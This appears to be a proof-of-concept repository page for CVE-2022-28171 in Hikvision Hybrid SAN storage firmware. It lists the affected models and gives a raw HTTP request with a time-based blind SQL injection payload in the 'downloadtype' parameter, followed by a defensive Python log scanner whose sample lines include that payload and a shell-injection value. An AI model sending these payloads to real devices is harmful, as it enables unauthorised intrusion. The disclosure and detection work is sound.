
CVE-2022-28171 PoC — Hikvision Hybrid SAN/Cluster Storage Command Injection Vulnerability

Associated Vulnerability
Title: Hikvision Hybrid SAN/Cluster Storage Command Injection Vulnerability (CVE-2022-28171)
Description: Hikvision Hybrid SAN/Cluster Storage Products are a series of economical and reliable hybrid SAN (storage area network) products from the Chinese company Hikvision. Hikvision Hybrid SAN/Cluster Storage contains a security vulnerability caused by insufficient input validation in the web module. An attacker can exploit it by sending messages containing malicious commands in order to execute restricted commands.
Readme
# CVE-2022-28171-POC

I originally published this on ExploitDB, which you can find at https://www.exploit-db.com/exploits/51607

### Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution

```
# Date: 16  July 2023
# Exploit Author: Thurein Soe
# CVE : CVE-2022-28171
# Reference Link: https://cve.report/CVE-2022-28171
# Vulnerable Versions:
Ds-a71024 Firmware
Ds-a71024 Firmware
Ds-a71048r-cvs Firmware
Ds-a71048 Firmware
Ds-a71072r Firmware
Ds-a71072r Firmware
Ds-a72024 Firmware
Ds-a72024 Firmware
Ds-a72048r-cvs Firmware
Ds-a72072r Firmware
Ds-a80316s Firmware
Ds-a80624s Firmware
Ds-a81016s Firmware
Ds-a82024d Firmware
Ds-a71048r-cvs
Ds-a71024
Ds-a71048
Ds-a71072r
Ds-a80624s
Ds-a82024d
Ds-a80316s
Ds-a81016s
```
### Vendor Description:

Hikvision is a world-leading surveillance manufacturer and supplier of video surveillance and Internet of Things (IoT) equipment for civilian and military purposes. Some Hikvision Hybrid SAN products were vulnerable to multiple remote code execution vulnerabilities such as command injection, blind SQL injection, HTTP request smuggling, and reflected cross-site scripting. These allowed remote code execution, including execution of arbitrary operating system commands.

### Vulnerability description
The manual test confirmed that the "downloadtype" parameter was vulnerable to blind SQL injection and command injection.
I created a Python script to automate and enumerate SQL versions, as the application was behind the firewall and blocked all the requests from SQLmap.

### Request Body
```
GET /web/log/dynamic_log.php?target=makeMaintainLog&downloadtype='(select*from(select(sleep(10)))a)' HTTP/1.1
Host: X.X.X.X.12:2004
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Connection: close
```
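As an added defender-side example (not part of the original PoC, ExploitDB entry, or the Hikvision product): a small Python scanner that reads web-server access-log lines and flags requests to the dynamic_log.php endpoint whose "downloadtype" value carries SQL-injection indicators (quotes, `sleep(`, `select`) or shell metacharacters. The log format and the sample lines are constructed for the example; the second sample line reuses the request from the advisory above.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (common log format), not real traffic.
# Line 2 is the sleep()-based blind SQL injection request shown in the advisory;
# line 3 carries a shell metacharacter (";") in the same parameter.
SAMPLE_LOG = """\
10.0.0.5 - - [16/Jul/2023:10:00:01 +0000] "GET /web/log/dynamic_log.php?target=makeMaintainLog&downloadtype=syslog HTTP/1.1" 200 512
10.0.0.9 - - [16/Jul/2023:10:00:07 +0000] "GET /web/log/dynamic_log.php?target=makeMaintainLog&downloadtype='(select*from(select(sleep(10)))a)' HTTP/1.1" 200 88
10.0.0.9 - - [16/Jul/2023:10:00:20 +0000] "GET /web/log/dynamic_log.php?target=makeMaintainLog&downloadtype=syslog%3Bsleep%205 HTTP/1.1" 200 90
10.0.0.5 - - [16/Jul/2023:10:01:00 +0000] "GET /web/index.php HTTP/1.1" 200 2048
"""

TARGET_PATH = "/web/log/dynamic_log.php"   # endpoint named in the advisory
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) \S+" (\d{3}) (\d+)')
# SQL indicators: quote characters, time-based functions, SELECT/UNION keywords.
SQLI_RE = re.compile(r"(['\"]|\bsleep\s*\(|\bbenchmark\s*\(|\bselect\b|\bunion\b)", re.I)
# Shell metacharacters that should never appear in a log-type selector.
CMDI_RE = re.compile(r"[;|&`$\n\r]")


def classify_downloadtype(value):
    """Return the list of indicator classes found in one decoded downloadtype value."""
    hits = []
    if SQLI_RE.search(value):
        hits.append("sqli")
    if CMDI_RE.search(value):
        hits.append("cmdi")
    return hits


def scan_access_log(text):
    """Yield one finding per suspicious request to the vulnerable endpoint."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                       # skip lines that are not in the expected format
        src, ts, method, url, status, size = m.groups()
        parts = urlsplit(url)
        if parts.path != TARGET_PATH:
            continue
        params = parse_qs(parts.query, keep_blank_values=True)
        for raw in params.get("downloadtype", []):
            value = unquote(raw)           # second decode catches double-encoded payloads
            hits = classify_downloadtype(value)
            if hits:
                findings.append({"src": src, "time": ts, "value": value, "indicators": hits})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['time']} {f['src']} downloadtype={f['value']!r} -> {f['indicators']}")
```

The same check can be applied inline by a reverse proxy or WAF in front of the storage appliance; a strict allow-list of expected log types for "downloadtype" is the simpler mitigation where that value set is known.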
File Snapshot

```
[4.0K] /data/pocs/3eb39296d6a4a9e53244528bd47e58b73b308897
├── [1.7K] BlindSQL_Injection.py.md
├── [1.9K] Command Injection.py.md
└── [1.9K] README.md

0 directories, 3 files
```